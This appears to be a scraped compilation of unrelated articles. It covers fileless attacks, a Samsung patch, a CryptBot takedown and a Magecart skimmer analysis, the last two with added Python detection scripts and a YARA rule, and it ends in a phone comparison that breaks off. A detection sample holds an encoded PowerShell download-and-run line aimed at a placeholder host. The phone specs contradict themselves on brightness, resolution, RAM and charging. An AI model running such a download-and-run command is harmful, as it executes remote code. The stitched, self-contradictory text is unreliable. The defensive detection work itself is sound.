How attackers evade traditional AV and how to stop them


Find threats camouflaging themselves in RAM.

When you hear about malware, there’s a good chance you think of sketchy executables or files with extensions like .DOCX or .PDF that, once opened, execute malicious code. These are examples of file-based attacks—and while they can be bad, they’re nothing compared to their fileless cousins.

As the name suggests, fileless attacks don’t rely on traditional executable files to get the job done but rather in-memory execution, which helps them evade detection by conventional security solutions.

In this post, we’ll explore topics like how fileless attacks work, why they’re effective, and what you can do to find and block fileless threats.

Fileless attacks explained

In contrast to file-based attacks, which execute the payload from the hard drive, fileless attacks execute the payload in Random Access Memory (RAM). For an attacker, executing malicious code directly in memory instead of from the hard drive has several benefits, such as:

  • Evasion of traditional security measures: Fileless attacks bypass antivirus software and file signature detection, making them difficult to identify using conventional security tools.   
  • Increased potential for damage: Since fileless attacks can operate more stealthily and with greater access to system resources, they may be able to cause more damage to a compromised system than file-based attacks.
  • Memory-based attacks can be difficult to remediate: Since fileless attacks don’t create files, they can be more challenging to remove from a system once they have been detected. This can make it extra difficult for forensics to trace an attack back to the source and restore the system to a secure state.

Fileless attacks vs Living-off-the-land (LOTL) attacks

If you read our article on LOTL attacks, you may be confused: Aren’t fileless attacks and LOTL attacks the same thing? Well, yes and no.

A LOTL attack is any attack in which an attacker leverages legitimate tools to evade detection, steal data, and more, while a fileless attack refers purely to executing code directly in memory. While the two types of attack often overlap, they are not synonymous.

Think of fileless attacks as an occasional subset of LOTL attacks. Fileless attacks can and often do leverage LOTL techniques to execute a payload in memory, but they can also do so without leveraging a legitimate system tool or process at all.

PowerShell script extracted from a Microsoft Word document. If macros are enabled, the code would execute in memory when the document is opened.

For example, an attacker can use PowerShell to download and execute a malicious payload directly in memory, without writing it to the disk. In this case, the attack is both LOTL (since PowerShell is a legitimate tool) and fileless (as the payload is executed in memory).

On the other hand, an attacker injecting malicious JavaScript into a website can exploit browser vulnerabilities and execute payloads in memory. This fileless attack executes code without writing to the hard drive, but doesn’t qualify as LOTL as it doesn’t use a legitimate system tool or process.

5 different ways fileless attacks execute code in memory

Once an attacker gains access through phishing or exploiting vulnerabilities, they can execute malicious code in memory using several methods, some of which may overlap with LOTL techniques.

Below are five common techniques used in fileless attacks:

  • PowerShell: A legitimate scripting tool that can execute malicious code directly in memory. As mentioned earlier, this technique overlaps with LOTL attacks as it leverages a built-in system tool.
  • Process hollowing: Process hollowing is a fileless technique where attackers create a new process in a suspended state, replace its memory content with malicious code, and then resume the process. The malicious code executes in memory without writing to the disk.
  • Reflective DLL injection: In this fileless attack, attackers load a malicious Dynamic Link Library (DLL) into a legitimate process’s memory without writing it to the disk. The DLL is executed directly in memory, evading detection by traditional security software.
  • JavaScript and VBScript: Fileless attackers can use JavaScript or VBScript to run malicious code directly in memory within a web browser or other applications that support these scripting languages.
  • Microsoft Office macros: Fileless attackers can use malicious macros embedded in Microsoft Office documents to execute code in memory when the document is opened. This method takes advantage of the legitimate macro functionality, making it an example of an LOTL technique as well.

Note that in each of these instances, fileless attacks often rely on exploiting vulnerabilities in system components (such as Office or web browsers) to execute their code.

Preventing and spotting fileless attacks: Quick tips

Prevention Method | Description
--- | ---
Keep software and systems updated | Regularly update your operating systems, applications, and security software to patch vulnerabilities that could be exploited by fileless attackers.
Regularly review security logs | Examine security logs for unusual activity or patterns that could indicate a fileless attack, such as unexpected PowerShell usage or excessive network connections.
Employ behavioral analytics | Use advanced threat detection tools that employ behavioral analytics to identify and block fileless attacks based on their unique behavior patterns.
Restrict macro usage | Limit the use of Microsoft Office macros by disabling them or allowing only digitally signed and trusted macros.
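
One way to act on the "review security logs" tip, shown as an added example that is not Malwarebytes code: a Python triage pass over process-creation events that flags PowerShell launches carrying in-memory execution traits such as an Office parent process or an encoded command. The event field names, the indicator list and the sample events are assumptions constructed for illustration.

```python
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# A command-line flag followed by a long Base64-looking argument.
FLAG_WITH_BLOB = re.compile(
    r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/]{16,}={0,2})(?=\s|$)")

# Traits checked in the visible command line and in any decoded payload.
INDICATORS = {
    "download-and-run": re.compile(
        r"(?i)\b(?:downloadstring|downloaddata|net\.webclient|invoke-webrequest)\b"),
    "dynamic-eval": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "hidden-window": re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+(?:hidden|1)\b"),
}


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (or -e / -enc / -ec), else None."""
    for flag, blob in FLAG_WITH_BLOB.findall(cmdline):
        flag = flag.lower()
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue
        try:
            # PowerShell expects Base64 over UTF-16LE text.
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:
            continue
    return None


def triage(event):
    """Return the list of reasons an event looks like in-memory execution."""
    if event["image"].lower() not in SCRIPT_HOSTS:
        return []
    reasons = []
    if event["parent"].lower() in OFFICE_PARENTS:
        reasons.append("office-parent")
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded-command")
        text += "\n" + decoded  # indicators are also searched inside the payload
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            reasons.append(name)
    return reasons


def review(events):
    """Return (host, reasons) for every event with at least one reason."""
    return [(e["host"], r) for e in events if (r := triage(e))]


def _encode(script):
    """Build an -EncodedCommand argument for the constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; hosts, paths and the URL are placeholders.
SAMPLE_EVENTS = [
    {"host": "ws-014", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')")},
    {"host": "ws-022", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"host": "srv-03", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws-031", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -e " + _encode("Get-Date")},
]

if __name__ == "__main__":
    for host, reasons in review(SAMPLE_EVENTS):
        print(host, ", ".join(reasons))
```

An encoded command on its own (ws-031) is a weak signal that administrators also produce; the combination with an Office parent and a download-and-run payload (ws-014) is what deserves priority.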

Malwarebytes EDR and Exploit Protection: Safeguarding against fileless attacks

Malwarebytes Exploit Protection can effectively block many fileless attacks by monitoring and reinforcing application behavior, hardening applications, and ensuring advanced memory protection.

To configure Exploit Protection Advanced settings, follow these steps:

Exploit Protection settings in a policy in Malwarebytes EDR.

Here’s an overview of the protection layers offered by Malwarebytes EDR Exploit Protection:

  • Application Hardening: By enforcing security measures like DEP and ASLR, and disabling potentially vulnerable components like Internet Explorer VB Scripting, Application Hardening reduces the attack surface and makes it more difficult for fileless malware to exploit weaknesses in applications.
  • Advanced Memory Protection: This layer prevents fileless malware from executing payload code in memory by detecting and blocking techniques such as DEP bypass, memory patch hijacking, and stack pivoting, thereby stopping the attack before it can cause harm.
  • Application Behavior Protection: This layer also detects and blocks exploits that do not rely on memory corruption, such as Java sandbox escapes or application design abuse exploits. Options include Malicious LoadLibrary Protection, Protection for Internet Explorer VB Scripting, Protection for MessageBox Payload, and protection against various Microsoft Office macro exploits. 
  • Java Protection: These settings protect against exploits commonly used in Java programs. By guarding against Java-specific exploits, such as web-based Java command execution and Java Meterpreter payloads, Java Protection can effectively prevent fileless attacks that leverage Java vulnerabilities to infiltrate systems and execute malicious code.

Fighting fileless threats with Malwarebytes EDR: Configuring Suspicious Activity Monitoring in Nebula

Malwarebytes Endpoint Detection and Response (EDR) offers an effective solution to detect and mitigate fileless malware threats by monitoring potentially malicious behavior on endpoints. The Suspicious Activity Monitoring feature in Nebula uses machine learning models and cloud-based analysis to detect questionable activities. In this section, we will outline how to configure Suspicious Activity Monitoring in Nebula.

To enable Suspicious Activity Monitoring in your policy:

  • Log in to your Nebula console.
  • Navigate to Configure > Policies.
  • Click “New” or select an existing policy.
  • Choose the “Endpoint Detection and Response” tab.
  • Locate “Suspicious Activity Monitoring” and enable it for the desired operating systems.

Suspicious Activity monitoring detections in Nebula showing a possible fileless attack. On the right, we see the command line context for this process in our organization.

Advanced Settings offer additional options for activity monitoring. To configure these settings:

  • In the same “Endpoint Detection and Response” tab, find the “Advanced Settings” section.
  • Enable “Server operating system monitoring for suspicious activity” to extend monitoring to server operating systems. 
  • Enable “Very aggressive detection mode” to apply a tighter threshold for flagging processes as suspicious. 
  • Toggle “Collect networking events to include in searching” to ON (default) or OFF, depending on your preference. Turning it OFF decreases traffic sent to the cloud.

Flight Recorder Search

Flight Recorder Search collects all endpoint events within its search functionality. By configuring Suspicious Activity Monitoring in Malwarebytes EDR through the Nebula platform, you can effectively counter fileless malware threats by monitoring processes, registry, file system, and network activity on the endpoint. 

Respond to fileless attacks quickly and effectively

Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to fileless attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection. 


Samsung is already rolling out May 2023 update to Galaxy devices


Samsung has made a habit of releasing the latest monthly security patches way ahead of schedule. It often starts pushing a new security update several days before we hit the new month. The Korean behemoth has done it again. It has begun seeding the May 2023 Android security patch to its Galaxy devices. But unlike most past instances, the company is starting with an entry-level model this time around. The Galaxy A10e is picking up the May SMR (Security Maintenance Release) ahead of flagship models.

The May update for the Galaxy A10e is currently available for users in Samsung’s home country South Korea. The rollout began earlier this week with the firmware build number A102NKOS3CWD1, SamMobile reports. Since May is still a few days away, we don’t have details of the patch. It’s unclear which vulnerabilities have been fixed with the latest monthly security release for Android devices. As usual, there should be several dozen fixes here, including a few Galaxy-specific ones coming directly from Samsung.

Don’t expect anything apart from the latest security fixes, though. Samsung launched the Galaxy A10e in July 2019. The entry-level smartphone is now on its last legs (fourth year in the market). It stopped receiving major Android updates after Android 11 and will soon stop getting security patches too. The May SMR could be the penultimate update for it. The 2019 handset isn’t covered under the Korean firm’s extended update policy that promises five years of security updates for Galaxy devices.

Nonetheless, if you’re using the Galaxy A10e, you may receive the May update sooner or later. It’s not guaranteed, though. Samsung may not push the May SMR to this phone outside of South Korea. The US version recently received the April update (firmware version A102USQSFCWC3 for carrier-locked units and A102U1UESFCWD1 for unlocked units), which never reached the company’s homeland. It may now skip the May release in other markets. As usual, you can check for new updates from the Settings app on your phone.

Samsung will soon release the May update for other Galaxy devices

The Galaxy A10e may not get the May update everywhere but Samsung will soon release the latest SMR for other Galaxy devices. Despite beginning with a budget handset, flagship models should still get the priority once it starts a wider rollout. The Galaxy S23 series should sit high on this priority list, though not necessarily at the top. We will let you know as and when these updates come.



Google takes legal action to take down CryptBot malware


It’s no secret that over the past few years, threat actors have become more sophisticated in their efforts to scam people out of their hard-earned money and steal personal information. One of the methods threat actors have recently been using to infiltrate systems is the CryptBot malware. This malicious software steals sensitive information such as passwords, cookies, and credit card information and sells it to other malware makers and distributors. However, Google has finally taken action and disrupted the malware’s infrastructure and distributors.

In the blog post announcing the decision, Google revealed that the CryptBot malware, which spread through malicious apps such as a fake Google Chrome and Google Earth Pro, infected around 670,000 computers last year, compromising users’ personal information and selling it for data breach campaigns. However, Google’s recent action will help prevent new infections and slow the malware’s growth.

“Lawsuits have the effect of establishing both legal precedents and putting those profiting, and others who are in the same criminal ecosystem, under scrutiny. This litigation is another step forward in holding cybercriminals accountable, by not just targeting those that operate botnets, but also those that profit from malware distribution,” reads the company’s blog post.

How did Google take down the malware?

Google’s actions against the malware came after the company identified the malware’s Pakistan-based distributors with the help of its Threat Analysis Group (TAG) and took legal action against them. Google filed a legal complaint against many major CryptBot distributors and secured a temporary court order to hamper the developers’ ability to spread the malware. With the order, Google was able to take down the current and future domains linked to the distribution of the malware.

While Google’s action against the malware distributors is commendable, considering its brand identity was at stake, the incident highlights the need for users to take necessary precautions while browsing the web. These include downloading apps and software from credible sources, keeping operating systems up to date, and installing antivirus software.



Magecart threat actor rolls out convincing modal forms


It’s hard to put individuals at fault when the malicious copy is better than the original. This credit card skimmer was built to fool just about anyone.

To ensnare new victims, criminals will often devise schemes that attempt to look as realistic as possible. Having said that, it is not every day that we see the fraudulent copy exceed the original piece.

While following up on an ongoing Magecart credit card skimmer campaign, we were almost fooled by a payment form that looked so well done we thought it was real. The threat actor used original logos from the compromised store and customized a web element known as a modal to perfectly hijack the checkout page.

While the technique to insert frames or layers is not new, the remarkable thing here is that the skimmer looks more authentic than the original payment page. We were able to observe several more compromised sites with the same pattern of using a custom-made and fraudulent modal.

This skimmer and associated campaigns represent one of the most active Magecart attacks we have been tracking in recent months.

Smooth checkout 

We identified a compromised website for a Parisian travel accessory store running on the PrestaShop CMS. A skimmer we previously identified as Kritec was injected and loaded malicious JavaScript that altered the checkout process. In the following section, we will compare the checkout process when the skimmer is active and when it is not.

Fraudulent payment form

What we see here is the use of a ‘modal’, which is a web page element displayed in front of the current active page. The modal disables and grays out the background so that the user can focus on the presented element instead. This is an elegant way for website owners to keep their customers on the same website and have them interact with another form.

Figure 1: Compromised store loads fake payment modal

The problem is that this modal is entirely fake and designed to steal credit card data. It may sound hard to believe given that everything matches the original brand and feel of the site. Before digging further into why it is fraudulent, we will take a look at the same online store when the skimmer has been disabled.

Actual (real) payment form

In order to view this legitimate sequence, we first had to block the skimmer when requesting the e-commerce page. In our case, we simply blocked the connection to the malicious domain where the skimmer is hosted. As a result, the website will display what the original payment form should be (prior to the compromise).

Figure 2: Legitimate payment form when same store is not compromised

The actual payment flow for this merchant is to redirect users to a third-party processor hosted by Dalenys, now part of Payplug, a French payment solutions company. So rather than display a modal, it loads the webpage for the payment processor to allow the user to enter their banking information. Once that is validated, it will take them back to the merchant page.

Malicious modal

The malicious modal is built very cleanly and contains an animation that displays the store’s logo in the middle and then moves it back up. We have to give credit where credit is due: this is a very well done skimmer that is actually a smoother user experience than the store’s default. We should also note that the malware author is not only well versed in web design, they also use proper language (French) for each form field.

Figure 3: A closer look at the fake modal

However, we noticed a small mistake in the hyperlink for Politique de confidentialité (terms of use). That link redirects to the terms of use for Mercado Pago, a payment processor used in South America. It is likely the threat actor copied the data from a previous template and did not notice their mistake. This is just a detail, and does not affect the functionality of the skimmer at all.

We can try to look for this erroneous hyperlink within the skimmer source code in order to confirm that the modal was created by the threat actor. The skimmer is rather complex and heavily obfuscated but we can see that HTML content is generated dynamically and goes through a decodeURIComponent routine.

Figure 4: Extracting code from the skimmer to reveal connection with the modal

If we step through the code until the modal is loaded, we can grab the Base64 value corresponding to the HTML content. Once we have it, we can convert it to plain text and finally see the reference to mercadopago, which is proof that the skimmer is the one rendering this beautiful modal. In fact, we can see the whole thing is an iframe called v.ECPay:

Figure 5: The iframe created by the skimmer to display the modal
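
The manual step described above (grab the Base64 value, convert it to text, look for what does not belong) can be automated for triage. The following Python sketch is an added example, not code from the skimmer or from Malwarebytes: it pulls long Base64 literals out of a script, decodes them, applies percent-decoding (the equivalent of decodeURIComponent), and reports any decoded HTML that contains card fields together with link hosts the store does not normally use. The decoding order, the field-name heuristic, and all hosts and sample data are assumptions constructed for illustration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import quote, unquote, urlsplit

# Quoted string literals that look like Base64 and are long enough to hold markup.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")
# Heuristic for payment-card input names (assumption, tune per site).
CARD_FIELD = re.compile(r"(?i)card|cvv|cvc|expir")


def decode_layers(literal):
    """Base64-decode, then percent-decode; None if the literal is not text."""
    try:
        text = base64.b64decode(literal, validate=True).decode("utf-8")
    except ValueError:  # bad Base64 or bytes that are not UTF-8
        return None
    return unquote(text)


class FormScan(HTMLParser):
    """Collect card-like input names and every absolute link host."""

    def __init__(self):
        super().__init__()
        self.card_fields = []
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input":
            name = attrs.get("name") or attrs.get("id") or ""
            if CARD_FIELD.search(name):
                self.card_fields.append(name)
        for key in ("href", "src", "action"):
            host = urlsplit(attrs.get(key) or "").hostname
            if host:
                self.hosts.add(host)


def host_expected(host, expected_hosts):
    """True if host is an expected domain or one of its subdomains."""
    return any(host == e or host.endswith("." + e) for e in expected_hosts)


def find_embedded_forms(script_source, expected_hosts):
    """Report payment forms hidden inside encoded string literals."""
    findings = []
    for literal in B64_LITERAL.findall(script_source):
        html = decode_layers(literal)
        if html is None:
            continue
        scan = FormScan()
        scan.feed(html)
        scan.close()
        if scan.card_fields:
            findings.append({
                "card_fields": scan.card_fields,
                "unexpected_hosts": sorted(
                    h for h in scan.hosts if not host_expected(h, expected_hosts)),
            })
    return findings


# Constructed sample: an encoded payment form plus a harmless encoded setting.
_MODAL_HTML = (
    '<div class="modal"><form action="#">'
    '<input name="cardnumber"><input name="cvv"><input name="holder">'
    '<a href="https://www.store.example/cgv">CGV</a>'
    '<a href="https://www.mercadopago.example/privacy">Politique de confidentialité</a>'
    '</form></div>'
)
_BENIGN = "theme=dark;lang=fr;currency=EUR;tracking=off;version=3"
SAMPLE_SCRIPT = "var _0x1a=['zIndex','%s','%s'];" % (
    base64.b64encode(quote(_MODAL_HTML).encode()).decode(),
    base64.b64encode(_BENIGN.encode()).decode(),
)

if __name__ == "__main__":
    print(find_embedded_forms(SAMPLE_SCRIPT, {"store.example", "processor.example"}))
```

A script that carries a complete payment form inside an encoded string is worth escalating even when every link looks expected; the unexpected host is simply the kind of slip that confirmed authorship in this case.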

Full payment flow

We recreated the payment flow from the perspective of a customer shopping via that compromised store. We can see that upon selecting the credit card payment option, the malicious modal is loaded and will harvest their payment card details.

A fake error is then displayed briefly “votre paiment a été annulé” (your payment was cancelled) before the user is redirected to the real payment URL:

Figure 6: Payment process flow with the skimmer active

On the second attempt, the payment will go through and victims will be unaware of what just happened.

The skimmer will drop a cookie which will serve as an indication that the current session is now marked as completed. If the user were to go back and attempt the payment again, the malicious modal would no longer be displayed (instead the real payment method by the external processor Dalenys will be used).

Figure 7: Cookie dropped by skimmer once data has been stolen

Ongoing, covert campaigns

We now believe this Kritec skimmer is part of the same set of compromises in which malicious code is injected into vulnerable websites by placing it within the Google Tag Manager script. It is possible that multiple threat actors are involved in those campaigns and are customizing skimmers accordingly.

While many hacked stores had a generic skimmer, it appears the custom modals were developed fairly recently, maybe a month or two ago. The threat actor is using different domains to host the skimmer but names them in a similar way: [name of store]-loader.js.

We crawled several thousand e-commerce sites and found more fraudulent modals, in different languages.

Figure 8: A Dutch e-commerce site with the fake modal

Figure 9: A Finnish e-commerce site with the fake modal
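
The naming pattern noted above, [name of store]-loader.js served from a domain other than the store's, lends itself to a simple check when auditing your own storefront or crawling for affected sites. The Python sketch below is an added example and not the crawler used for this research; deriving the store name from the page's hostname labels is an assumption, and the page URL, hosts and HTML are constructed.

```python
import posixpath
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

LOADER_NAME = re.compile(r"^([a-z0-9_-]+)-loader\.js$")


class ScriptSources(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src)


def _squash(text):
    """Lower-case and drop separators so 'Valise-Paris' equals 'valiseparis'."""
    return re.sub(r"[^a-z0-9]", "", text.lower())


def store_tokens(host):
    """Candidate store names: hostname labels except 'www' and the TLD."""
    labels = [label for label in host.lower().split(".") if label != "www"]
    return {_squash(label) for label in labels[:-1] if len(_squash(label)) >= 3}


def same_site(host, page_host):
    """True if host is the store's own domain or one of its subdomains."""
    base = page_host[4:] if page_host.startswith("www.") else page_host
    return host == base or host.endswith("." + base)


def suspicious_loaders(page_url, html):
    """Return off-site script URLs named '<store>-loader.js'."""
    page_host = (urlsplit(page_url).hostname or "").lower()
    tokens = store_tokens(page_host)
    parser = ScriptSources()
    parser.feed(html)
    hits = []
    for src in parser.sources:
        url = urljoin(page_url, src)  # resolves relative and //host forms
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if not host or same_site(host, page_host):
            continue
        match = LOADER_NAME.match(posixpath.basename(parts.path).lower())
        if match and _squash(match.group(1)) in tokens:
            hits.append(url)
    return hits


# Constructed checkout page for a fictional store.
SAMPLE_URL = "https://www.valise-paris.example/commande"
SAMPLE_HTML = """
<script src="/js/theme.js"></script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXXX"></script>
<script src="https://cdn.example.net/valise-paris-loader.js"></script>
<script src="//static.valise-paris.example/app-loader.js"></script>
<script src="https://cdn.example.org/jquery-loader.js"></script>
"""

if __name__ == "__main__":
    print(suspicious_loaders(SAMPLE_URL, SAMPLE_HTML))
```

This only inspects script tags present in the served HTML; scripts added at runtime, for example through a tag manager container, need a rendered DOM or network capture to be seen.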

Discerning whether an online store is trustworthy has become very difficult and this case is a good example of a skimmer that would not raise any suspicion.

If you are a Malwarebytes customer, you will get a notification and block when attempting to make a purchase from a store that has been compromised by this skimmer.

Figure 10: Skimmer being blocked by Malwarebytes

Indicators of Compromise


YARA rule

rule kritecloader
{
    // Matches only when all four quoted string literals below are present
    strings:
        $string = "'fetchModul'"
        $string2 = "'setAttribu'"
        $string3 = "'contentWin'"
        $string4 = "'zIndex'"

    condition:
        all of them
}


Whether you are visiting an online store from home or while at work, web protection is a critical layer in your overall defense. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against threats like Magecart.


Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra


The Xiaomi 13 Ultra is one of the hottest new phones on the market. In this article, we’ll compare it with the best Apple has to offer. We’ll compare the Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra. These two smartphones are both great, but in entirely different ways. That applies not only to their designs, but to pretty much everything else, too. So, there’s a lot to talk about here.

We’ll kick things off by listing their specifications, and will then move to a number of other categories. You’ll get to see their designs compared, and the same goes for their displays, performance, battery life, cameras, and audio performance. Having said that, let’s get this party on the road, shall we?

Specs

 | Apple iPhone 14 Pro Max | Xiaomi 13 Ultra
--- | --- | ---
Screen size | 6.7-inch LTPO Super Retina XDR OLED display (flat, 120Hz refresh rate, 200 nits peak brightness) | 6.73-inch QHD+ LTPO AMOLED display (curved, 120Hz adaptive refresh rate, 2,600 nits peak brightness)
Screen resolution | 2796 x 1290 | 3120 x 1440
SoC | Apple A16 Bionic | Qualcomm Snapdragon 8 Gen 2
RAM | 6GB | 12GB (LPDDR5X)
Storage | 128GB, 256GB, 512GB, 1TB, non-expandable | 256GB/512GB, non-expandable (UFS 4.0)
Rear cameras | 48MP (f/1.8 aperture, wide-angle, 1.22um pixel size, sensor-shift OIS, dual pixel PDAF); 12MP (ultrawide, f/2.2 aperture, 13mm, 120-degree FoV, 1.4um pixel size, dual pixel PDAF); 12MP (telephoto, f/2.8 aperture, 77mm lens, PDAF, OIS, 3x optical zoom) | 50.3MP (Sony’s IMX989 1-inch sensor, f/1.9-f/4.0 aperture, 23mm lens, 1.6um pixel size, multi-directional PDAF, Laser AF, OIS); 50MP (ultrawide, 122-degree FoV, f/1.8 aperture, 12mm lens, dual-pixel PDAF); 50MP (telephoto, f/1.8 aperture, 75mm lens, 3.2x optical zoom, dual-pixel PDAF); 50MP (periscope telephoto, 5x optical zoom, dual-pixel PDAF, OIS, 120mm lens)
Front cameras | 12MP (wide-angle, f/1.9 aperture, 23mm lens, PDAF); SL 3D (depth/biometrics sensor) | 32MP (wide angle)
Battery | 4,323mAh, non-removable, 23W wired charging, 15W MagSafe wireless charging, 7.5W Qi wireless charging, 5W reverse wireless charging; charger not included | 5,000mAh, non-removable, 90W wired charging, 50W wireless charging, 10W reverse wireless charging; charger included
Dimensions | 160.7 x 77.6 x 7.9mm | 163.2 x 74.6 x 9.1mm
Weight | 240 grams | 227 grams
Connectivity | 5G, LTE, NFC, Bluetooth 5.3, Wi-Fi, Lightning port | 5G, LTE, NFC, Bluetooth 5.3, Wi-Fi, USB Type-C
Security | Advanced facial scanning | In-display fingerprint scanner (optical)
OS | iOS 16 | Android 13; MIUI 14
Price | $1,099 | CNY5,999 ($872)+
Buy | Apple | China only for now

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Design

These two devices do look considerably different no matter what side you’re looking at them. They also feel entirely different in the hand. The iPhone 14 Pro Max is made out of metal and glass. The Xiaomi 13 Ultra, on the other hand, is made out of metal, with a layer of vegan leather on the back. That vegan leather does not cover the entirety of the backplate, even though it does cover most of it. It does not curve into the frame on the sides, though, that frame extends to the back, to a degree. It’s kind of difficult to explain. The upper portion of the phone’s back side is also higher than the bottom one. The backplate gradually increases in thickness to make the camera bump less pronounced.

The Xiaomi 13 Ultra is slightly taller than the iPhone 14 Pro Max, while it’s noticeably narrower. It’s also thicker than iPhone’s offering. The iPhone 14 Pro Max is 13 grams heavier, though both of these phones are quite hefty in the hand. They do have flat sides too. The flat surface on the iPhone 14 Pro Max definitely does take more space than on the Xiaomi 13 Ultra, as far as their sides are concerned. The Xiaomi 13 Ultra is a lot less slippery in comparison, and it also cuts into your hand less when you hold it. That’s a combination of the design and the fact it’s lighter than the iPhone 14 Pro Max.


Apple’s handset has a pill-shaped cutout on the front, and uniform bezels. The Xiaomi 13 Ultra has extremely thin bezels, and a display camera hole. The iPhone 14 Pro Max has a flat display, while Xiaomi’s flagship offers a curved one. When we flip the two phones around, even more differences are noticeable. Apple’s handset has three cameras on the back, organized in a camera island placed in the top-left corner. The Xiaomi 13 Ultra has a huge camera bump on the back, with four cameras included inside it. That camera bump is centered in the upper portion of the phone’s backplate. Both phones do feel premium in the hand, and both are IP68 certified for water and dust resistance.

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Display

The iPhone 14 Pro Max has a 6.7-inch 2796 x 1290 LTPO Super Retina XDR OLED display. This panel has a 120Hz refresh rate, which is adaptive. It supports HDR10 content, and it also comes with Dolby Vision support. We’re looking at a 19.5:9 aspect ratio here, while this display goes up to 2,000 nits of brightness at its peak. This panel is protected by the Ceramic Shield glass, and it’s flat.

The Xiaomi 13 Ultra, on the flip side, includes a 6.73-inch QHD+ (3200 x 1440) LTPO AMOLED display. This panel is curved, and it can project up to 1 billion colors. It supports HDR10+ content, and also comes with Dolby Vision support. It has a 20:9 display aspect ratio, and it can get immensely bright at 2,600 nits of peak brightness. This panel is protected by the Gorilla Glass Victus.

Let me just say that both of these displays are fantastic, to say the least. These are some of the best panels on the market. They’re bright, vivid, sharp, and offer great viewing angles. The blacks are deep, and the touch response is really good. The Xiaomi 13 Ultra’s panel does look a bit better on paper, but that’s, for the most part, not the difference you’ll notice. Both panels do get extremely bright outdoors, and both will be more than sufficient to use in bright daylight, even under direct sunlight. These panels are outstanding.

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Performance

Apple’s flagship is fueled by the Apple A16 Bionic SoC, while the phone comes with 6GB of RAM and NVMe storage. The Xiaomi 13 Ultra, on the other hand, is fueled by the Snapdragon 8 Gen 2 processor. It includes up to 16GB of LPDDR5X RAM and UFS 4.0 flash storage. These two processors are basically the best two mobile SoCs on the market at the moment. When it comes to RAM and storage, Xiaomi’s handset is more powerful.

What is the performance like, though? Well, outstanding, in both cases. These two phones do come with significantly different software builds, and software experiences, but the general performance, in terms of fluidity, is great. Both phones are buttery smooth regardless of how you’re using them. That goes for regular everyday tasks, and even gaming. Even the most demanding games on their respective app stores cannot slow down these two phones; they’re that great in terms of performance. So, that’s not something you have to worry about.

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Battery

The iPhone 14 Pro Max packs in a 4,323mAh battery. The Xiaomi 13 Ultra, on the other hand, has a 5,000mAh battery on the inside. Do note that iPhones need less battery capacity to deliver similar battery life due to different software. In any case, both of these smartphones do offer great battery life. They’ll last until the end of the day for the vast majority of you. Gaming and similar tasks can, of course, affect battery life more.

Reaching the 8-hour screen-on-time mark on the Xiaomi 13 Ultra is not a problem at all. I was able to get there most days, or would have been able to if I used the phone as much. I was even left with some battery life in the tank at that point. The iPhone 14 Pro Max did not do as great at launch, but things improved with updates. It can now also go over that point, and offers even better results at times. They’re mostly on the same playing field in terms of battery life, though.

Charging is another story entirely. The Xiaomi 13 Ultra completely destroys the iPhone 14 Pro Max in that regard. Xiaomi’s flagship not only supports 90W wired, 50W wireless, and 10W reverse wireless charging, but it also packs in a 90W charger in the box. The iPhone 14 Pro Max supports 20W wired, 15W MagSafe wireless, and 7.5W Qi wireless charging, and it does not offer a charger in the box.

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Cameras

The iPhone 14 Pro Max has three cameras on the back. A 48-megapixel main camera is backed by a 12-megapixel ultrawide unit (120-degree FoV), and a 12-megapixel telephoto camera (3x optical zoom). The Xiaomi 13 Ultra carries four 50-megapixel cameras on the back. It has a 50-megapixel main camera (1-inch sensor), a 50-megapixel ultrawide camera (122-degree FoV), a 50-megapixel telephoto unit (3.2x optical zoom), and a 50-megapixel periscope telephoto camera (5x optical zoom, 100x digital zoom). Xiaomi’s flagship also comes with Leica lenses, and some software too.


These two devices produce rather different pictures. During the day, they’re both outstanding. The images from the iPhone tend to have a slightly warmer tone, but both results are very sharp, and detailed. The Xiaomi 13 Ultra does handle HDR situations a bit better, but only at times when the iPhone 14 Pro Max decides to mess up the white balance. That’s still an issue from time to time.

